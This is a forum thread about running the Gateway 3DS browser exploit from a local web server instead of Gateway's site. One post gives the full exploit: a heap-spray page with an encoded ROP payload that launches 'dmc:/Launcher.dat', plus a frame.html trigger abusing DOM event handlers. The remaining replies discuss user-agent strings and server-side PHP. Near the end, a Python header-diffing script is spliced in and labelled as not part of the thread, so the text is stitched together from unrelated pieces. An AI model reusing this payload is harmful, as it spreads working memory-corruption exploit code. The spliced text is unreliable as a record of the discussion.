Hacking WIP: Getting Gateway website exploit running on local webserver

  • Thread starter Deleted-19228

Deleted-19228

The magic numbers are based on the User-Agent that is sent over to the go.gateway-3ds.com website. I have copied my UA from my 3DS XL and dumped the HTML source from the Gateway site to one of my own, and it says "Failed to load web page" and after a few seconds dumps you back to the main menu with an error like what other people are getting when attempting to run the exploit, which requires them to clear cookies or some such. That's definitely not the cause in this case. If anyone has any ideas on what to do please share. I don't like the idea of having to rely on their web server. It's gone down too many times recently :P
 

Seanshoots

HTML:
<html>
<head>
<style>
    body {
        color:white;
        background:black;
    }
   
   
</style>
<script>
    function magicfun(mem, size, v) {
        var a = new Array(size - 20);
        nv = v + unescape("%ucccc");
        for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
        var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));
 
        mem.push(t);
    }
 
    function dsm(evnt) {
        var mem = [];
 
        for (var j = 20; j < 430; j++) {
            magicfun(mem, j, unescape("\u57c4\u0010\u57c4\u0010\u57c4\u0010\u57c4\u0010\uc2fc\u0010\u50b3\u0010\uca34\u0019\u85f0\u08b8\u8008\u0018\ua00c\u001d\u46eb\u0019\u0000\u08f1\u8630\u08b8\u0001\u0000\ub020\u0039\uc01c\u001c\u6010\u002c\ufe0c\u0022\u1ff0\u0023\ubff0\u002c\u4000\u0012\udff4\u0033\u57c4\u0010\uc2fc\u0010\ua000\u0001\u8af4\u0022\u0004\u08f1\u7334\u0010\uc024\u001c\u46eb\u0019\u0000\u08f1\u0020\u08f1\u1000\u08f0\u4000\u0000\u5ff8\u0029\u3ffc\u0025\u86e0\u0016\ue030\u002b\u2010\u0021\u1f40\u0027\uc05c\u0020\ue0c4\u002d\u2000\u001b\uc2fc\u0010\u850c\u08b8\ubacc\u0011\u57c4\u0010\u8af4\u0022\u8281\ud582\u0658\u0035\udd48\u0011\u8af4\u0022\u850c\u08b8\u7334\u0010\u4850\u0035\uc2fc\u0010\u8618\u08b8\ubacc\u0011\u7f6d\u0012\u014c\u0010\u37e0\u0010\u848c\u08b8\u840c\u08b8\ubacc\u0011\ubb00\u0011\u57c4\u0010\u8af4\u0022\u0000\u0000\u0658\u0035\u03a0\u0013\u65a8\u0010\u1434\u0010\uff64\u0022\u03a0\u0013\u8400\u08b8\u57c4\u0010\u57c4\u0010\u0b5c\u0010\ufe44\u0022\u57c4\u0010\u5ae0\u002c\u57c4\u0010\u8af4\u0022\u0658\u0035\u57c4\u0010\u2c93\u0018\uc2fc\u0010\u8618\u08b8\ubacc\u0011\udd48\u0011\u6694\u0010\u6694\u0010\u8af4\u0022\u0004\u0000\u0658\u0035\u0344\u0013\u8af4\u0022\u8618\u08b8\u7334\u0010\u0d24\u0010\u8af4\u0022\ub000\uf70f\u0658\u0035\u9864\u0011\u1a8c\u0015\u59c0\u0020\uc2fc\u0010\u8610\u08b8\u8af4\u0022\u0ffc\u08f0\u6694\u0010\u5fd4\u0035\u8af4\u0022\u84a8\u08b8\ufc24\u0010\u2215\u002c\u57c4\u0010\u57c4\u0010\u65a8\u0010\u5654\u002d\u3778\u0010\ua864\u002f\u9b94\u0011\ue780\u0020\u8605\u0012\u3da8\u0010\u85f8\u08b8\u57c4\u0010\u5ae0\u002c\udf28\u0010\uc8e4\u002f\u37e0\u0010\uc494\u0023\u0358\u0013\u1000\u08f0\u0344\u0013\u8400\u08b8\u57c4\u0010\u57c4\u0010\u0344\u0013\u0064\u006d\u0063\u003a\u002f\u004c\u0061\u0075\u006e\u0063\u0068\u0065\u0072\u002e\u0064\u0061\u0074\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0344\u0013\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u000
0\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000"));
        }
    }
</script>
</head>
<body>
        <h1 align="center">GATEWAY 3DS LOADING...</h1>
        <iframe width=0 height=0 src="frame.html"></iframe>
</body>
</html>

frame.html source
HTML:
<html>
    <head>
        <script>
            var nb = 0;
            function handleBeforeLoad() {
                if (++nb == 1) {
                    p.addEventListener('DOMSubtreeModified', parent.dsm, false);
                } else if (nb == 2) {
                    p.removeChild(f);
                }
            }
           
            function documentLoaded() {
                f = window.frameElement;
                p = f.parentNode;
                var o = document.createElement("object");
                o.addEventListener('beforeload', handleBeforeLoad, false);
                document.body.appendChild(o);
            }
 
            window.onload = documentLoaded;
        </script>
    </head>
    <body>
        KEKEKEKEK...
    </body>
</html>
 

arielp

They're using index.php; the actual URL is http://go.gateway-3ds.com/index.php

Unfortunately, the PHP source cannot be seen from the user side.

If they're running some PHP code within... you cannot replicate it.

Unless you can reverse engineer it (which is not possible by only looking at the above HTML code), or you can get the index.php source from the Gateway team (unlikely).

Most probably they're running something; otherwise they can just use index.html or index.htm.
 

arielp

That HTML code above is already processed by PHP (web server) only to show HTML content / Java; the PHP code itself cannot be seen, unless you find an exploit in their server/hack it and then grab that index.php (and all related items).

That's how PHP works.

Sample PHP code:

<?php
$sample = "hello world";
echo $sample;
?>

What you see from the user's browser with "view source" is only:

hello world
 

s-arash

You can't exploit a browser with PHP because it's server side.

So all of the things that the Gateway webpage does are about JavaScript code, which is client side, and you can view it.
 

Thomas12345

Well, I managed to get the exploit up without connecting to the Gateway website...

Basically I set up a proxy server on my Linux box, and on my 3DS connected to said proxy, dumped the index.html and frame.html, and created a simple web server to serve the two pages.

Turns out the index.html I dumped with this method is different from what I got when I just changed my PC's web browser's user agent to the 3DS user agent.
 

Seanshoots

Thomas12345 said:
Well, I managed to get the exploit up without connecting to the Gateway website...

Basically I set up a proxy server on my Linux box, and on my 3DS connected to said proxy, dumped the index.html and frame.html, and created a simple web server to serve the two pages.

Turns out the index.html I dumped with this method is different from what you get if you simply changed user agent to the 3DS user agent.


I used Fiddler and set it up as a proxy on my 3DS. It's weird because the page I posted worked when I dumped it, but when I use Fiddler's autoresponder (loads pages locally instead of sending requests) or host them on my own server I only get an error. Don't know what's wrong, but I don't have a gateway card to do anything right now anyways.
 

Duo8

What do you think the php code is for? If it's just for detecting and distributing the payload then it shouldn't matter.
 

Vappy

Thomas12345 said he got it working, could try replicating his method. Of course that only gives you the static html for your 3DS configuration, and not the PHP script generating them, but that one set of pages would probably work for all other consoles of the same model and version. If someone made an archive of all combinations, it'd be a fine alternative to Gateway's own site.
 

hias

The payload differs according to the user agent you are using. You need the correct user agent according to your 3DS firmware version. You can find information about the user agent strings on 3dbrew:

http://3dbrew.org/wiki/Internet_Browser

The easiest way to get the correct agent for your 3DS is to set up a site on your local webserver which displays the user agent of the accessing web browser, then visit it with your 3DS. If it does not work when you use a proxy, the proxy uses a wrong user agent.

Just use the user agent switcher addon for Firefox and you are good to go.
Gateway uses PHP to supply the correct payload according to the user agent; no exploit is going on here server side.

You can also use sites like this:

http://www.whatsmyua.com
 

Duo8

hias said:
The payload differs according to the user agent you are using. You need the correct user agent according to your 3DS firmware version. You can find information about the user agent strings on 3dbrew, google it.

The easiest way to get the correct agent for your 3DS is to set up a site on your local webserver which displays the user agent of the accessing web browser, then visit it with your 3DS. If it does not work when you use a proxy, the proxy uses a wrong user agent.

Just use the user agent switcher addon for Firefox and you are good to go.
Gateway uses PHP to supply the correct payload according to the user agent; no exploit is going on here server side.

Or just follow this:
Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7567.US

<lang> is "en", "fr", etc. <region> is "US", "EU", etc. See below for <version>

Version is in browser settings.
 

Deleted-19228

It's not generated using ONLY the UA. There is something else that is sent over.
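
Added example, not part of the original thread or any poster's code: a server that varies its response per client can key on any request header, not only User-Agent, so a common way to analyse this kind of per-client response is to diff a request captured from the real client against one sent by a browser with a spoofed User-Agent. Both captures below are constructed; only the host, path and User-Agent string come from the thread, and nothing here shows which header the Gateway server actually uses.

```python
# Constructed sample captures (not real traffic). Host, path and the User-Agent
# value are quoted from the thread; every other header is made up for illustration.
DEVICE_REQUEST = (
    "GET /index.php HTTP/1.1\r\n"
    "Host: go.gateway-3ds.com\r\n"
    "User-Agent: Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7567.US\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en\r\n"
    "\r\n"
)
DESKTOP_REQUEST = (
    "GET /index.php HTTP/1.1\r\n"
    "Host: go.gateway-3ds.com\r\n"
    "user-agent: Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7567.US\r\n"
    "Accept: text/html,application/xhtml+xml\r\n"
    "Accept-Language: en-US,en;q=0.5\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "\r\n"
)

def parse_request(raw):
    """Return (request_line, {lowercased header name: [values]}) from raw request text."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            continue  # skip malformed lines instead of guessing at them
        # Header names are case-insensitive; repeated headers keep all values.
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers

def diff_requests(raw_a, raw_b):
    """Map each differing header to (values_in_a, values_in_b); None means absent."""
    line_a, hdr_a = parse_request(raw_a)
    line_b, hdr_b = parse_request(raw_b)
    delta = {}
    if line_a != line_b:
        delta[":request-line"] = ([line_a], [line_b])
    for name in sorted(set(hdr_a) | set(hdr_b)):
        if hdr_a.get(name) != hdr_b.get(name):
            delta[name] = (hdr_a.get(name), hdr_b.get(name))
    return delta

if __name__ == "__main__":
    for name, (a, b) in diff_requests(DEVICE_REQUEST, DESKTOP_REQUEST).items():
        print(f"{name}: device={a} desktop={b}")
```

With identical User-Agent values the diff still lists three headers, which is why matching the UA alone does not make two clients indistinguishable to a server.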
 
